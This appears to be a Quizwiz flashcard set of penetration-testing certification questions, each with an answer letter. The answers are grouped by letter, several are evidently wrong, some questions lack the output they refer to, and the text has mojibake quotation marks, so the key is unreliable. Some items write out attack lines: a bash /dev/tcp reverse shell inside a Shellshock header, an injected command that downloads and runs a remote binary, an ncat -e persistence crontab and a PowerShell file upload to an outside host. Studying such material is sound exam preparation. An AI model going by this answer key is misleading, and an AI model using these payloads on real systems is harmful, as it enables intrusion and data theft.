pen2

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? A. OpenVAS B. Drozer C. Burp Suite D. OWASP ZAP

A

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation? A. Implement a recurring cybersecurity awareness education program for all users. B. Implement multifactor authentication on all corporate applications. C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy. D. Implement an email security gateway to block spam and malware from email communications

a

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement? A. Direct-to-origin B. Cross-site scripting C. Malware injection D. Credential harvesting

a

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wirelessIDS solutions?

a

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the clientג€™s requirements? A. ג€cisco-iosג€ ג€admin+1234ג€ B. ג€cisco-iosג€ ג€no-passwordג€ C. ג€cisco-iosג€ ג€default-passwordsג€ D. ג€cisco-iosג€ ג€last-modifiedג€

a

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal? A. VRFY and EXPN B. VRFY and TURN C. EXPN and TURN D. RCPT TO and VRFY

a

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following tools will help the tester prepare an attack for this scenario? A. Hydra and crunch B. Netcat and cURL C. Burp Suite and DIRB D. Nmap and OWASP ZAP

a

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective? A. Socat B. tcpdump C. Scapy D. dig

a

A penetration tester is exploring a clientג€™s website. The tester performs a curl command and obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang=ג€enג€><head><meta name=ג€viewportג€ content=ג€width=device-widthג€ /><meta http-equiv=ג€Content-Typeג€ content=ג€text/html; charset=utf-8ג€ /><title>WordPress › ReadMe</title><link rel=ג€stylesheetג€ href=ג€wp-admin/css/install.css?ver=20100228ג€ type=ג€text/cssג€ /></head>Which of the following tools would be BEST for the penetration tester to use to explore this site further?

a

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? A. iam_enum_permissions B. iam_privesc_scan C. iam_backdoor_assume_role D. iam_bruteforce_permissions

a

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system? A. Weekly B. Monthly C. Quarterly D. Annually

a

A penetration tester ran a ping ג€"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type? A. Windows B. Apple C. Linux D. Android

a

A penetration tester ran an Nmap scan on an Internet-facing network device with the ג€"F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap ג€"O ג€"A ג€"sS ג€"p- 100.100.100.50Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies.

a

A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT? A. ftp 192.168.53.23 B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 ג€"U guest C. ncrack ג€"u Administrator ג€"P 15worst_passwords.txt ג€"p rdp 192.168.53.23 D. curl ג€"X TRACE https://192.168.53.23:8443/index.aspx E. nmap ג€"-script vuln ג€"sV 192.168.53.23

a

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel

a

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle D. Ping of death

a

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit? A. Perform XSS. B. Conduct a watering-hole attack. C. Use BeEF. D. Use browser autopwn.

a

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT? A. Reach out to the primary point of contact B. Try to take down the attackers C. Call law enforcement officials immediately D. Collect the proper evidence and add to the final report

a

A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve? A. Determine active hosts on the network. B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most used ports.

a

A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?

a

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3

a

Given the following output:User-agent:*Disallow: /author/Disallow: /xmlrpc.php -Disallow: /wp-admin -Disallow: /page/During which of the following activities was this output MOST likely obtained? A. Website scraping B. Website cloning C. Domain enumeration D. URL enumeration

a

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons learned during the engagement

a

The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device? A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. B. This device is most likely a gateway with in-band management services. C. This device is most likely a proxy server forwarding requests over TCP/443. D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

a

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? A. MD5 B. bcrypt C. SHA-1 D. PBKDF2

a

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? A. Clarify the statement of work. B. Obtain an asset inventory from the client. C. Interview all stakeholders. D. Identify all third parties involved.

a

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2

a

A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the companyג€™s web presence.Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.) A. IP addresses and subdomains B. Zone transfers C. DNS forward and reverse lookups D. Internet search engines E. Externally facing open ports F. Shodan results

ab

The results of an Nmap scan are as follows:Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 ESTNmap scan report for ( 10.2.1.22 )Host is up (0.0102s latency).Not shown: 998 filtered ports -Port State Service -80/tcp open http|_http-title: 80F 22% RH 1009.1MB (text/html)|_http-slowloris-check:| VULNERABLE:| Slowloris DoS Attack| <..>Device type: bridge|general purposeRunning (JUST GUESSING) : QEMU (95%)OS CPE: cpe:/a:qemu:qemu -No exact OS matches found for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done: 1 IP address (1 host up) scanned in 107.45 secondsWhich of the following device types will MOST likely have a similar response? (Choose two.) A. Network device B. Public-facing web server C. Active Directory domain controller D. IoT/embedded device E. Exposed RDP F. Print queue

ab

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.) A. Buffer overflows B. Cross-site scripting C. Race-condition attacks D. Zero-day attacks E. Injection flaws F. Ransomware attacks

ab

Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities

ac

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.) A. The libraries may be vulnerable B. The licensing of software is ambiguous C. The librariesג€™ code bases could be read by anyone D. The provenance of code is unknown E. The libraries may be unsupported F. The libraries may break the application

ac

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. Nikto

ae

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan? A. nmap ג€"vv sUV ג€"p 53, 123-159 10.10.1.20/24 ג€"oA udpscan B. nmap ג€"vv sUV ג€"p 53,123,161-162 10.10.1.20/24 ג€"oA udpscan C. nmap ג€"vv sUV ג€"p 53,137-139,161-162 10.10.1.20/24 ג€"oA udpscan D. nmap ג€"vv sUV ג€"p 53, 122-123, 160-161 10.10.1.20/24 ג€"oA udpscan

b

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? A. Halt the penetration test. B. Conduct an incident response. C. Deconflict with the penetration tester. D. Assume the alert is from the penetration test.

b

A consultant is reviewing the following output after reports of intermittent connectivity issues:-> (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]-> (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]-> (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]-> (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]-> (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]-> (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]-> (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]-> (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]Which of the following is MOST likely to be reported by the consultant? A. A device on the network has an IP address in the wrong subnet. B. A multicast session was initiated using the wrong multicast group. C. An ARP flooding attack is using the broadcast address to perform DDoS. D. A device on the network has poisoned the ARP cache.

b

A penetration tester conducted a vulnerability scan against a clientג€™s critical servers and found the following: Which of the following would be a recommendation for remediation? A. Deploy a user training program B. Implement a patch management plan C. Utilize the secure software development life cycle D. Configure access controls on each of the servers

b

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future? A. Enforce mandatory employee vacations B. Implement multifactor authentication C. Install video surveillance equipment in the office D. Encrypt passwords for bank account information

b

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process? A. certutil ג€"urlcache ג€"split ג€"f http://192.168.2.124/windows-binaries/accesschk64.exe B. powershell (New-Object System.Net.WebClient).UploadFile(ג€˜http://192.168.2.124/upload.phpג€™, ג€˜systeminfo.txtג€™) C. schtasks /query /fo LIST /v | find /I ג€Next Run Time:ג€ D. wget http://192.168.2.124/windows-binaries/accesschk64.exe ג€"O accesschk64.exe

b

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the providerג€™s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? A. Cross-site request forgery B. Server-side request forgery C. Remote file inclusion D. Local file inclusion

b

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:✑ Pre-engagement interaction (scoping and ROE)✑ Intelligence gathering (reconnaissance)✑ Threat modeling✑ Vulnerability analysis✑ Exploitation and post exploitation✑ ReportingWhich of the following methodologies does the client use? A. OWASP Web Security Testing Guide B. PTES technical guidelines C. NIST SP 800-115 D. OSSTMM

b

A penetration tester obtained the following results after scanning a web server using the dirb utility:...GENERATED WORDS: 4612 ----- Scanning URL: http://10.2.10.13/ ----+ http://10.2.10.13/about (CODE:200|SIZE:1520)+ http://10.2.10.13/home.html (CODE:200|SIZE:214)+ http://10.2.10.13/index.html (CODE:200|SIZE:214)+ http://10.2.10.13/info (CODE:200|SIZE:214)...DOWNLOADED: 4612 ג€" FOUND: 4 -Which of the following elements is MOST likely to contain useful information for the penetration tester?

b

A penetration tester wants to scan a target network without being detected by the clientג€™s IDS. Which of the following scans is MOST likely to avoid detection? A. nmap ג€"p0 ג€"T0 ג€"sS 192.168.1.10 B. nmap ג€"sA ג€"sV --host-timeout 60 192.168.1.10 C. nmap ג€"f --badsum 192.168.1.10 D. nmap ג€"A ג€"n 192.168.1.10

b

A penetration tester was able to gain access successfully to a Windows workstation on a mobile clientג€™s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B. wmic startup get caption,command C. crontab ג€"l; echo ג€@reboot sleep 200 && ncat ג€"lvp 4242 ג€"e /bin/bashג€) | crontab 2>/dev/null D. sudo useradd ג€"ou 0 ג€"g 0 user

b

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = ג€POST ג€ exploit += ג€/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} ג€" c${IFS}ג€™cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apacheג€™%0A%27&loginUser=a&Pwd=aג€exploit += ג€HTTP/1.1ג€Which of the following commands should the penetration tester run post-engagement?

b

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the clientג€™s IP address. The tester later discovered the SOC had used sinkholing on the penetration testerג€™s IP address. Which of the following BEST describes what happened? A. The penetration tester was testing the wrong assets B. The planning process failed to ensure all teams were notified C. The client was not ready for the assessment to start D. The penetration tester had incorrect contact information

b

A penetration tester who is performing a physical assessment of a companyג€™s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? A. Badge cloning B. Dumpster diving C. Tailgating D. Shoulder surfing

b

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server.

b

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries? A. Immunity Debugger B. OllyDbg C. GDB D. Drozer

b

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems: A. will reveal vulnerabilities in the Modbus protocol. B. may cause unintended failures in control systems. C. may reduce the true positive rate of findings. D. will create a denial-of-service condition on the IP networks.

b

Which of the following is the MOST effective person to validate results from a penetration test? A. Third party B. Team leader C. Chief Information Officer D. Client

b

Which of the following tools provides Python classes for interacting with network protocols? A. Responder B. Impacket C. Empire D. PowerSploit

b

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff? A. A quick description of the vulnerability and a high-level control to fix it B. Information regarding the business impact if compromised C. The executive summary and information regarding the testing company D. The rules of engagement from the assessment

b

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment? A. Ensure the client has signed the SOW. B. Verify the client has granted network access to the hot site. C. Determine if the failover environment relies on resources not owned by the client. D. Establish communication and escalation procedures with the client

c

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands.

c

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment? A. A signed statement of work B. The correct user accounts and associated passwords C. The expected time frame of the assessment D. The proper emergency contacts for the client

c

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback B. Download .pl files and look for usernames and passwords C. Edit the smb.conf file and upload it to the server D. Download the smb.conf file and look at configurations

c

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? A. Forensically acquire the backdoor Trojan and perform attribution B. Utilize the backdoor in support of the engagement C. Continue the engagement and include the backdoor finding in the final report D. Inform the customer immediately about the backdoor

c

A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch ג€"r .bash_history temp mv temp .bash_historyWhich of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history for further enumeration C. Covering tracks by clearing the Bash history D. Making decoy files on the system to confuse incident responders

c

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a pre-shared key.

c

A penetration tester has been given eight business hours to gain access to a clientג€™s financial system. Which of the following techniques will have the highest likelihood of success? A. Attempting to tailgate an employee going into the client's workplace B. Dropping a malicious USB key with the companyג€™s logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management

c

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software companyג€™s network. Which of the following accounts should the tester use to return the MOST results? A. Root user B. Local administrator C. Service D. Network administrator

c

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective? A. Create a one-shot systemd service to establish a reverse shell. B. Obtain /etc/shadow and brute force the root password. C. Run the nc -e /bin/sh <... command. D. Move laterally to create a user account on LDAP

c

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 ג€"PU22-25,80 B. nmap 192.168.1.1-5 ג€"PA22-25,80 C. nmap 192.168.1.1-5 ג€"PS22-25,80 D. nmap 192.168.1.1-5 ג€"Ss22-25,80

c

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities? A. Comma B. Double dash C. Single quote D. Semicolon

c

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employeeג€™s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing

c

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting

c

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a companyג€™s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take? A. Perform forensic analysis to isolate the means of compromise and determine attribution. B. Incorporate the newly identified method of compromise into the red teamג€™s approach. C. Create a detailed document of findings before continuing with the assessment. D. Halt the assessment and follow the reporting procedures as outlined in the contract.

c

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task? A. nmap ג€"f ג€"sV ג€"p80 192.168.1.20 B. nmap ג€"sS ג€"sL ג€"p80 192.168.1.20 C. nmap ג€"A ג€"T4 ג€"p80 192.168.1.20 D. nmap ג€"O ג€"v ג€"p80 192.168.1.20

c

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the companyג€™s privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? A. OpenVAS B. Nikto C. SQLmap D. Nessus

c

Appending string values onto another string is called: A. compilation B. connection C. concatenation D. conjunction

c

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target companyג€™s servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment? A. Test for RFC-defined protocol conformance. B. Attempt to brute force authentication to the service. C. Perform a reverse DNS query and match to the service banner. D. Check for an open relay configuration.

c

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects.

c

Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team? A. To provide feedback on the report structure and recommend improvements B. To discuss the findings and dispute any false positives C. To determine any processes that failed to meet expectations during the assessment D. To ensure the penetration-testing team destroys all company data that was gathered during the test

c

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU

c

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations? A. NIST SP 800-53 B. OWASP Top 10 C. MITRE ATT&CK framework D. PTES technical guidelines

c

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? A. Whether the cloud service provider allows the penetration tester to test the environment B. Whether the specific cloud services are being used by the application C. The geographical location where the cloud services are running D. Whether the country where the cloud service is based has any impeding laws

c

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe type-casting operations

c

A penetration tester is reviewing the following SOW prior to engaging with a client:ג€Network diagrams, logical and physical asset inventory, and employeesג€™ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the clientג€™s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.ג€Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.) A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the clientג€™s senior leadership team D. Seeking help with the engagement in underground hacker forums by sharing the clientג€™s public IP address E. Using a software-based erase tool to wipe the clientג€™s findings from the penetration testerג€™s laptop F. Retaining the SOW within the penetration testerג€™s company for future use so the sales team can plan future engagements

ce

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:ג€¢ The following request was intercepted going to the network device:GET /login HTTP/1.1 -Host: 10.50.100.16 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0Accept-Language: en-US,en;q=0.5 -Connection: keep-alive -Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jkג€¢ Network management interfaces are available on the production network.ג€¢ An Nmap scan returned the following: Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

ce

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.) A. The CVSS score of the finding B. The network location of the vulnerable device C. The vulnerability identifier D. The client acceptance form E. The name of the person who found the flaw F. The tool used to find the issue

cf

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software companyג€™s request? A. The reverse-engineering team may have a history of selling exploits to third parties. B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis. C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry. D. The reverse-engineering team will be given access to source code for analysis.

d

A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis? A. nmap ג€"oG list.txt 192.168.0.1-254 , sort B. nmap ג€"sn 192.168.0.1-254 , grep ג€Nmap scanג€ | awk ג€˜{print S5}ג€™ C. nmap ג€"-open 192.168.0.1-254, uniq D. nmap ג€"o 192.168.0.1-254, cut ג€"f 2

d

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& /dev/tcp/127.0.0.1/9090 0>&1ג€, ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} B. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} C. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/sh ג€"i ps ג€"efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} D. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€, ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

d

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action? A. ROE B. SLA C. MSA D. NDA

d

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? A. Add a dependency checker into the tool chain. B. Perform routine static and dynamic analysis of committed code. C. Validate API security settings before deployment. D. Perform fuzz testing of compiled binaries.

d

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings? A. Manually check the version number of the VoIP service against the CVE release B. Test with proof-of-concept code from an exploit database C. Review SIP traffic from an on-path position to look for indicators of compromise D. Utilize an nmap ג€"sV scan against the service

d

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective? A. Alternate data streams B. PowerShell modules C. MP4 steganography D. PsExec

d

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:✑ Have a full TCP connection✑ Send a ג€helloג€ payload✑ Walt for a response✑ Send a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective? A. Run nmap ג€"Pn ג€"sV ג€"script vuln <IP address>. B. Employ an OpenVAS simple scan against the TCP port of the host. C. Create a script in the Lua language and use it with NSE. D. Perform a credentialed scan with Nessus.

d

A penetration tester ran the following command on a staging server: python ג€"m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell ג€"exec bypass ג€"f \\10.10.51.50\9891 C. bash ג€"i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit D. wget 10.10.51.50:9891/exploit

d

A penetration tester runs the following command on a system:find / -user root ג€"perm -4000 ג€"print 2>/dev/nullWhich of the following is the tester trying to accomplish? A. Set the SGID on all files in the / directory B. Find the /root directory on the system C. Find files with the SUID bit set D. Find files that were created during exploitation and move them to /dev/null

d

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following wouldBEST support this task? A. Run nmap with the ג€"o, -p22, and ג€"sC options set against the target B. Run nmap with the ג€"sV and ג€"p22 options set against the target C. Run nmap with the --script vulners option set against the target D. Run nmap with the ג€"sA option set against the target

d

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them? A. As backup in case the original documents are lost B. To guide them through the building entrances C. To validate the billing information with the client D. As proof in case they are discovered

d

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team? A. Multiple handshakes B. IP addresses C. Encrypted file transfers D. User hashes sent over SMB

d

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information? A. Create a custom password dictionary as preparation for password spray testing. B. Recommend using a password manage/vault instead of text files to store passwords securely. C. Recommend configuring password complexity rules in all the systems and applications. D. Document the unprotected file repository as a finding in the penetration-testing report.

d

